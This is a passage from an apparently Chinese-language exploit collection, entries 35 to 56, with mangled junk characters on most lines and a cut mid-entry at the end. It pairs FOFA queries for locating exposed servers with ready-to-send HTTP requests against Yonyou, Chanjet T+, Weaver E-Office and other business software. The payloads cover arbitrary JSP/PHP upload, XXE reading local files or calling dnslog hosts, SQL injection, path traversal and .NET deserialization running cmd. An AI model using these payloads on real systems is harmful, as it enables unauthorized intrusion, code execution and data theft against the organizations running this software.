35. 用友NC-Cloud importhttpscer任意文件上传
% V/ z: n t7 mFOFA:app="用友-NC-Cloud"
8 K7 |& e- p3 k; y. `POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
4 d2 O& h; f! E, P5 AHost: 203.25.218.166:8888
. x' {# b' D5 I5 ]$ {User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
1 c! i! S1 F0 u! R# o! aAccept-Encoding: gzip, deflate
! \0 d" q, W U- ?3 ?! _0 J. m$ rAccept: */*
9 O4 S* S4 ~4 R8 h* `) cConnection: close! ^* V% m0 n9 t3 S( C2 P8 e+ h
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
: j' W" m4 P% h L; m! }2 {Content-Length: 190
: G) o6 u$ }' }2 N' o) OContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
: G0 o$ G; u' h/ m
$ j9 J/ B# F1 x, ^7 p8 [8 p$ }--fd28cb44e829ed1c197ec3bc71748df0! a/ x1 A# k; W: n% p9 E
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
. b' _7 W0 B5 z- L, E
: i6 ^! ~% D: u- y1 @1 D+ F<%out.println(1111*1111);%>
5 o0 I! W/ c% p3 F: b--fd28cb44e829ed1c197ec3bc71748df0--) x/ |8 g5 G8 z2 W' _! k
[+ J# m) A8 t) b8 t% M
) c. d$ Z! L6 f6 W$ J. ]" \; ?1 f36. 用友NC-Cloud soapFormat XXE
6 r" T" ?% t, @/ T7 d; ^FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"6 b+ r) V' q, |
POST /uapws/soapFormat.ajax HTTP/1.18 v; \* y: [: L$ t2 J# p3 P
Host: 192.168.40.130:8989
" p; o, x: Y5 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.03 k) y% k7 P$ O7 V
Content-Length: 263
+ f1 {, x+ t. t+ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) t) H; g! \* a1 W) N% t* P
Accept-Encoding: gzip, deflate
C& T! b& d& {0 D7 u! z3 M; YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. _# u# X; I8 D; k1 z, h2 d
Connection: close
/ M0 { E3 {9 } x( y3 sContent-Type: application/x-www-form-urlencoded6 B0 I" J$ ?7 a2 B) D) U
Upgrade-Insecure-Requests: 1
" X9 k% a1 Y) ^4 ?8 B0 ~: Y8 e' t: F3 f% @7 A7 b, |- G% Z
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a1 n! N1 K* ?( P+ c
: O7 g5 D) L; i: B s" N. [8 N, h
1 X4 @7 d0 I ~* X; f37. 用友NC-Cloud IUpdateService XXE
9 F- `: Z7 t! C; J% t% h- a( `2 sFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"5 K8 Q$ ^7 G/ }' E, W
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
G' J/ ]6 j3 ]+ e7 NHost: 192.168.40.130:8989/ X. N' P0 O% A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
4 \# k2 q# z! TContent-Length: 421; o' m: Y, l3 b* F" W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9* c' _, \# D+ G* ~; C
Accept-Encoding: gzip, deflate
* Y+ z# B6 @* @0 z9 K W: FAccept-Language: zh-CN,zh;q=0.97 P* M. {! N" w8 O7 h! o( W
Connection: close
2 _ e: l8 K% p% \Content-Type: text/xml;charset=UTF-8
% ?5 d4 M' i) H; E7 mSOAPAction: urn:getResult! i* q, v" a, M
Upgrade-Insecure-Requests: 1
& a( N) d: n* q, c! S# R2 P
0 ^1 t: C' V% b" T& g<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">% d8 n* t6 s* c! E7 G
<soapenv:Header/> Q; F0 \: J0 [9 {1 W
<soapenv:Body># n- U& [2 r0 B Q7 [ R
<iup:getResult>
, b; E$ \2 ~2 ^+ H2 e<!--type: string-->0 H4 ?9 R+ L+ a! Z0 {% z
<iup:string><![CDATA[
' L0 P4 W/ w# d<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>; A0 \# y# Q: r: C$ v
<xxx/>]]></iup:string>7 O- F' m2 z4 n% b$ |
</iup:getResult>* t+ {3 k5 i$ R0 n3 q
</soapenv:Body>. d# H+ V. |7 Q- N/ O l" A
</soapenv:Envelope>4 q9 I- h) q$ b. r' ~# d+ f
S# x0 M# Y8 Y8 @7 O0 X. c e) b! ~- s
3 d* x5 ?. p/ T4 M6 Y6 { \) t
38. 用友U8 Cloud smartweb2.RPC.d XXE( s% h: b4 P$ F
FOFA:app="用友-U8-Cloud"2 O3 l5 x( s6 N& }8 s: L
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
& b% E4 A1 Y5 A( IHost: 192.168.40.131:8088
5 n2 L) N% G z( c- d) p3 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25( d' w) T0 b; b! I6 G. L* L; r
Content-Length: 2604 ?/ C. n3 @' x( L$ V# |& P: T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
2 R. P- r6 s& O7 E) fAccept-Encoding: gzip, deflate
" A, t* p$ L" j0 `$ }: TAccept-Language: zh-CN,zh;q=0.91 \' E1 n# `2 T' T% p0 a
Connection: close$ H c& z% z6 B- D
Content-Type: application/x-www-form-urlencoded1 S- k1 @2 c2 [! H+ j: u
0 i- ~9 y- a& @7 ?4 j) I__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>( [' p# e: f3 w7 k0 O, [ v
+ P6 J: y, h* m7 Y3 |9 P
; ?& U* C3 T% q0 E1 a
39. 用友U8 Cloud RegisterServlet SQL注入, E N; S8 b( e! W. [, s
FOFA:title="u8c"6 Q7 E. r( u! |# ~3 z( i7 M
POST /servlet/RegisterServlet HTTP/1.1
A! s( f* R( g: F- D1 UHost: 192.168.86.128:8089
: I! n$ H7 i3 Q$ ]# DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
- Z# k! ]8 S. w5 AConnection: close2 N& i, x; \4 j
Content-Length: 85
/ L( x0 o9 C; s- j" P4 _Accept: */*
! s8 t0 q! v: I: z+ pAccept-Language: en
1 p7 B3 m/ d d+ K& q% C# A hContent-Type: application/x-www-form-urlencoded) e& R5 K) G3 u' q2 _
X-Forwarded-For: 127.0.0.1
1 j P. V8 s8 J' r8 ~. L+ QAccept-Encoding: gzip
! V& S6 p3 V# c' z2 ]* Y, e( L: O+ F5 u* l0 P3 w
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
9 o9 x l, Q& z, K: }. _& y7 W# g( |. m F+ o$ z
, U8 P5 }2 O0 O& \) x! l
40. 用友U8-Cloud XChangeServlet XXE
6 z" c9 K: H1 s6 g6 n, vFOFA:app="用友-U8-Cloud"
, ^: t( ^( e( B0 y& _( ~POST /service/XChangeServlet HTTP/1.14 ^5 C2 A$ K. ?; }
Host: x.x.x.x1 S H; |) ?( W4 C0 w, |
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 ~$ O$ i: a% q
Content-Type: text/xml
- ^; u- q* J7 d: p& iConnection: close8 \0 {/ l1 v2 o1 d
' S' V$ d, `6 P6 B& E2 f+ \) ]<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
Z0 P. n' I. C/ U; Y6 C7 C- F+ V9 V4 o( ^' M( N' H
q3 j0 ]$ c1 U. u$ G' A v9 y
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
% c6 y+ J7 p n' ~$ k; j# i3 uFOFA:app="用友-U8-Cloud"
( r2 X$ x7 e7 ~# P+ |GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
) Y$ }7 G0 H2 n5 FHost:
* |& H& J- Y8 M" C) SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" b9 G9 z4 I- Z1 HContent-Type: application/json
$ y" @& d' r4 b8 E/ D9 cAccept-Encoding: gzip: H" y9 D7 s6 P, v
Connection: close3 j6 l0 b1 X8 I8 {3 m# N
. p; K2 V( X& l5 H3 J6 ^: A6 i+ R$ P, b. i$ L
42. 用友GRP-U8 SmartUpload01 文件上传, ^, q% N2 w7 I0 o( m9 w# G: z+ z
FOFA:app="用友-GRP-U8" U* s9 w7 y, T6 q* Z! J
POST /u8qx/SmartUpload01.jsp HTTP/1.1" J0 f8 V h6 ^3 n, k! L
Host: x.x.x.x7 ?( P/ V4 @/ M4 Y6 z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
. u2 f8 G% }% A: X' sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.360 ?& y0 i9 H& I3 J7 m
6 K" k. u, G6 ZPAYLOAD
8 ~" _$ E; B- L1 ~& `# M
6 [( b: u% r% T* a
4 _* i( _) ^. d7 s: l% _http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
2 t1 a# A. {- Q1 F7 x& K0 a' j2 D6 `! `3 `0 ~
43. 用友GRP-U8 userInfoWeb SQL注入致RCE5 r) P: J9 X' D9 v# f* ^
FOFA:app="用友-GRP-U8"
) L' J/ h5 p1 E; j) W! }: u& oPOST /services/userInfoWeb HTTP/1.1( E/ N6 R, A) O
Host: your-ip' ~% B& o6 ?1 L/ a2 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
( m0 O, V8 K/ C1 j8 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 p" S L, O* I2 D( D
Accept-Encoding: gzip, deflate
1 U' c o& v- Y. @; ^$ [4 AAccept-Language: zh-CN,zh;q=0.9
0 [; V. A: B6 f B! BConnection: close% ?8 k) L8 K) _. L
SOAPAction:
, v* L. Q; s7 |2 T7 u$ l8 M$ _: SContent-Type: text/xml;charset=UTF-8( u8 D0 @% H X5 U% S
2 ~" @9 w6 z$ _( W/ ~& _<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
* M( F( ]8 H1 B7 w8 J <soapenv:Header/>
) h1 M6 I% X* D <soapenv:Body>
! [3 E0 Y) {& j% p <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
( u/ p l1 S7 X/ s* y <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>* [9 i+ G2 p2 u4 g# Q$ \$ X3 g! |
</ser:getUserNameById>' g9 I: `7 a4 Z$ Y: Z
</soapenv:Body>, v0 Z- N. p! R9 Z5 A. T
</soapenv:Envelope>* Q* r& Q0 |2 j, Z n% T c
8 K6 p. Z2 B! W
( y8 K/ o8 _. h8 B& x! P3 ^+ C+ k: |( j
44. 用友GRP-U8 bx_dj_check.jsp SQL注入/ N+ f4 m& |# D8 k: C3 U9 z; c" @
FOFA:app="用友-GRP-U8"9 p3 O+ E W/ j! G- X
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
4 @8 N9 ]3 { T- \! ~Host: your-ip
6 d1 E, S" _: ~/ I8 Z, PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36& x2 p# i, k! t4 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, \! `2 r( @ ]+ ?" n
Accept-Encoding: gzip, deflate4 e7 F+ A% g# N% x3 r) i
Accept-Language: zh-CN,zh;q=0.9
1 v' a6 [! b2 r: c! {) ?Connection: close1 C t& @0 f3 v) v
; q4 E. V4 T2 N |- c
# e; N* R6 l$ I6 m. t4 V0 B
45. 用友GRP-U8 ufgovbank XXE
) l( B/ ]6 J; u* R4 gFOFA:app="用友-GRP-U8"" j: @- j u6 k4 U
POST /ufgovbank HTTP/1.1; k6 j0 [2 L7 K9 B# ~: ^2 f
Host: 192.168.40.130:2228 C4 u- o9 _5 D% p* E. A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
) L/ j& n3 B8 `$ u* eConnection: close5 ]4 U1 o1 w7 G3 w/ N
Content-Length: 1613 O: w6 E( ^6 m1 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" W+ j8 \# g$ ~+ }" L( D- sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 t c) v* G+ ^4 X3 ?
Content-Type: application/x-www-form-urlencoded8 E7 Z! s0 m N
Accept-Encoding: gzip) j+ F, N5 S! j. h
4 }. M, }# B. ~( X- {: PreqData=<?xml version="1.0"?>
& Y) T. m+ O7 }- z<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest' _' T$ o7 k: ~5 W
* z) U' o+ |. X; q
( V9 b/ _' d1 j9 J* [( l, F
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
( i1 c4 o9 _* lFOFA:app="用友-GRP-U8"
* _# C0 ^! o& B, w, _GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1) y' \# S) z& q+ p4 Q, Q
Host: your-ip
; G3 d2 X: l. |" C5 t ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36( F. d; K- g2 S+ h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: F' L0 w9 v" R, C( \# YAccept-Encoding: gzip, deflate4 ~# k3 Y2 D3 b8 E, k7 w1 w) I
Accept-Language: zh-CN,zh;q=0.99 J" L( O: ?" h0 F0 Z/ ]
Connection: close
4 q& u* D$ G7 ^' L1 z9 f9 [" f
2 Q- L7 S! K7 F* Z7 }3 ?+ e) q4 q' L, i( M% H$ v
47. 用友GRP A++Cloud 政府财务云 任意文件读取; a4 K' W8 I ?! o
FOFA:body="/pf/portal/login/css/fonts/style.css", g3 o; p' n* E$ y& |2 n! z3 f
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
0 r2 C. \6 S# ~; t4 dHost: x.x.x.x9 _! W! K/ D) F+ [+ k, ?: p- r
Cache-Control: max-age=0& o5 N! { A6 W4 f! E- T. c
Upgrade-Insecure-Requests: 1# B7 U$ F' u+ l6 [4 {" N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! P8 Y+ a) ?9 ?5 q6 S. V: X4 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& y! M7 \" ]2 f& h% T
Accept-Encoding: gzip, deflate, br
' F( ` o) D4 m6 K* T& I* s5 }* X( `Accept-Language: zh-CN,zh;q=0.9, {3 ~7 M I, H; V
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
; q- X1 ]- ]9 G6 t% `Connection: close8 k3 y+ ~) I( ^0 e/ W9 d
6 L E; ~- {# G7 p! s A" K% R* W- n- c( \' k* z
9 [. d! @- B* d- m. f48. 用友U8 CRM swfupload 任意文件上传) Z" l9 h" b. J
FOFA:title="用友U8CRM"# D# j' } `0 S- {& \& M( {
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1 ` K& d1 `) q
Host: your-ip
" u; y' H5 n' g7 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 B0 h' m Y. w# k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" k0 B, D" }$ mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, m: U6 h6 G4 Z# zAccept-Encoding: gzip, deflate. `# X3 z9 A$ W
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668556 c# f" H, r$ d: Z
------269520967239406871642430066855
! I$ D6 {! C5 D) I5 J0 c- c5 Z7 z! H5 IContent-Disposition: form-data; name="file"; filename="s.php"
+ h2 F/ g0 N @6 |$ U$ z3 \1231- T3 w4 j( w4 V
Content-Type: application/octet-stream# X" p9 b8 b! O6 B) u" p
------269520967239406871642430066855
. V: B, l/ ?% |2 z$ a8 s/ I8 CContent-Disposition: form-data; name="upload"
( l+ `; f* ]1 Mupload
@8 T1 g F( S& `4 v- Y% C8 c------269520967239406871642430066855--3 {" e( F* B" q9 S) v( @2 X' L7 |9 E1 y
2 f" _" A1 e Y
. H- G+ d9 E3 f/ v2 Q49. 用友U8 CRM系统uploadfile.php接口任意文件上传$ p. [' `4 J; c
FOFA:body="用友U8CRM"
/ v6 |5 t9 X6 {, `+ I' ?5 J
; N# S! \, d- p; k! _6 O _POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
0 b" M+ r s' [( s' A) T9 CHost: x.x.x.x
R% q6 L/ C0 s% j$ hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 m; S: G. g& S: r1 X
Content-Length: 3290 M6 _" z8 K6 R- s! v& K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: F; i0 i7 e% A4 W2 P9 l
Accept-Encoding: gzip, deflate/ `& y+ R! ^1 a' ?6 _/ u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# O! h0 k) t7 p* H/ J, `Connection: close h* E# t- ^' H1 @
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
% O5 f+ E' G6 e4 X
, H' ~2 {8 A! J" Z( R" g-----------------------------vvv3wdayqv3yppdxvn3w
" [- X+ O. ]3 E# Z, c) mContent-Disposition: form-data; name="file"; filename="%s.php "# r/ R/ N9 {" a& r
Content-Type: application/octet-stream3 I6 P2 T) W4 i! j- w; a
0 X" s9 J! v3 U- q2 Z% Vwersqqmlumloqa
0 R5 d0 v. B0 i5 D3 S" ]; A$ h' `-----------------------------vvv3wdayqv3yppdxvn3w; J% f( K; w* ?4 w# @, c& g
Content-Disposition: form-data; name="upload"
. s+ w8 V, A, j8 r/ c# t1 j' Y0 n+ x0 k( ^- s$ b
upload+ g& e8 w/ _- B( b3 V/ U, o% J
-----------------------------vvv3wdayqv3yppdxvn3w--
. ]$ M: E, j) h( \; h! Y/ D( r! M4 W4 T7 p
- n% G- K r1 y% ^! o' U. M2 p! @http://x.x.x.x/tmpfile/updB3CB.tmp.php9 q6 b, d4 k) U- L
: Z$ j F& u( x \* M
50. QDocs Smart School 6.4.1 filterRecords SQL注入& \& _9 s/ H& C
FOFA:body="close closebtnmodal"
7 D1 l9 s% z% j6 ]9 @( B CPOST /course/filterRecords/ HTTP/1.12 B2 [9 L* E ~; r( K
Host: x.x.x.x
+ e' T+ O' L" aUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 S: {, w+ }- BConnection: close
9 s- h& P, y# g( ~8 \7 V; q# gContent-Length: 224
) l! O- o j9 XAccept: */*2 a, y2 ?, ?9 W# ~, T
Accept-Language: en# Y$ {( P9 ~+ t H
Content-Type: application/x-www-form-urlencoded" B, L. W* ]# g1 ~
Accept-Encoding: gzip
% ]6 t" e5 F* b; @/ G% E1 N: B V; Z7 ]" h9 k
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
! J; y. Z0 Z0 x; t7 n5 }. j$ F. W5 `' n' y1 g
' c) `6 i9 G7 N. A
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
& R6 o3 h5 z' s# k# m& B5 WFOFA:app="云时空社会化商业ERP系统"* L. W! n1 R) Q% ?: U
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1; W# V3 N6 v: s. _3 z
Host: your-ip3 F# E6 j; Y% g5 P9 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" w, m8 o8 [9 ^: B# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: [! C$ q9 T U7 \Accept-Encoding: gzip, deflate- @- K! _& v, Z1 }) d' r3 N9 b _
Accept-Language: zh-CN,zh;q=0.9
* D3 F$ a, ?5 ~! s+ H% BConnection: close
8 I6 f0 n% C8 d2 N2 C% q; ]: \) L. Q/ }
* E7 n# D, A9 }8 p9 o$ F8 U, H5 G/ R
52. 泛微E-Office json_common.php sql注入* N$ v& K! q6 Q
FOFA:app="泛微-EOffice"
! K% [+ |# |$ m0 X, ?POST /building/json_common.php HTTP/1.1
4 M# q8 t; w. JHost: 192.168.86.128:8097( }' q# S6 ]2 t2 V
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. p5 g( X Q, t7 v O% @Connection: close4 a4 {) u% o' L' _* C
Content-Length: 877 |% K3 e& n3 \6 i0 y( Y
Accept: */*
' X, M7 B7 }: i5 Q/ rAccept-Language: en
0 j$ p; n* X0 p7 p. E% X1 OContent-Type: application/x-www-form-urlencoded6 p0 Z- }# U; K: A2 e. J
Accept-Encoding: gzip
2 q0 q+ `; g" l/ e
a2 J% z& I% {" ?: ^5 Jtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
: D" j5 W' t9 F: z' g; t2 t+ b/ t6 }* r% w0 [2 g* j \! m
+ |& e* F. M5 E
53. 迪普 DPTech VPN Service 任意文件上传
1 d8 T" p, k: gFOFA:app="DPtech-SSLVPN"
1 M: s- F) k7 Q( h/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
3 A0 r# [) n& {# c: X2 ^2 A1 A, |8 J9 l1 E8 H5 Q
; |' }. V. ~8 x U+ c3 K; R8 Q
54. 畅捷通T+ getstorewarehousebystore 远程代码执行5 A- c) Q1 j: C; ]3 M4 R% y, q
FOFA:app="畅捷通-TPlus"
5 e0 R" N! L, Y# Y第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件) R: A& W4 o* Y9 V2 @4 O8 N8 k
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
$ | z* E2 X I {1 x1 u
2 \) q; q# C, E6 l# g; e/ } d$ S4 T
, |! z% X0 c' o4 c* V0 j完整数据包
% r: a. Z" o1 Z7 U. y4 |& SPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
5 c9 s% b! O! eHost: x.x.x.x/ r* B1 l! F5 W: C
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F6 X I/ o H. `# {1 S3 M1 M
Content-Length: 593/ p' T/ ^8 ~' ?0 ~; X
! K; U; C; v& z& S& ^
{) v7 m% i+ ^+ ~7 b1 W
"storeID":{
6 F. z; _7 t! H! A: n9 d "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",* _* ]% W2 J8 J5 O- U {
"MethodName":"Start",
4 Q5 x% r- Y+ A9 m' @- M "ObjectInstance":{. }) I1 V* Q! W$ ~
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 ^# D) `! ]6 i! b
"StartInfo":{, h- v2 S/ s+ M* \* x
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",! u- _3 G4 E3 H. B) v
"FileName":"cmd",
) @8 Y, x: x _) @ "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
; \1 g8 q: \! W+ H! ?$ i. N }
) W1 H' p* ?1 E3 M }
; T7 ~9 v( ]% y( f0 o0 A2 ]0 `, [ }) ~! K" V6 J) C1 x" i/ g$ t
}
" N7 s4 R. R' F5 g
4 m$ j; }; v3 i5 }& Y3 M
2 g+ s* e5 T! x第二步,访问如下url9 K f8 j5 l! \1 C
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt$ U5 J: V0 O/ s
0 `6 B: ~' H/ R
( t& l" S( e9 J3 D$ R55. 畅捷通T+ getdecallusers信息泄露- k# H$ X6 J5 r# j
FOFA:app="畅捷通-TPlus"
# B# V8 x7 D+ _' U% V第一步,通过
4 n; M! f7 `# n) m5 Z5 z/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie: D) x" a3 \2 G: m" \. u
第二步,利用获取到的Cookie请求
3 @& G0 a% K, n/ N0 k/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
" t! _0 Q8 F2 ^1 a0 \
: C) t% t9 l* N; B% K1 {56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
) P& E6 g: b; Q: S5 VFOFA: app="畅捷通-TPlus"$ {% H) S' \! f
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
$ j7 `( I8 R8 R2 M: CHost: x.x.x.x
* S+ X, A( m% C# `7 g5 Y0 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36, T/ J& U, P, U! ?% C% V" F
Content-Type: application/json: ^/ a6 L, v1 b3 m9 T* U
4 M% L7 w3 z2 P0 j4 K; c{
4 m$ }0 I) m8 h' r; g2 s. u "storeID":{$ U0 }% l1 x+ ?8 |0 `, a
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",6 y7 e" {: D$ k, x4 b
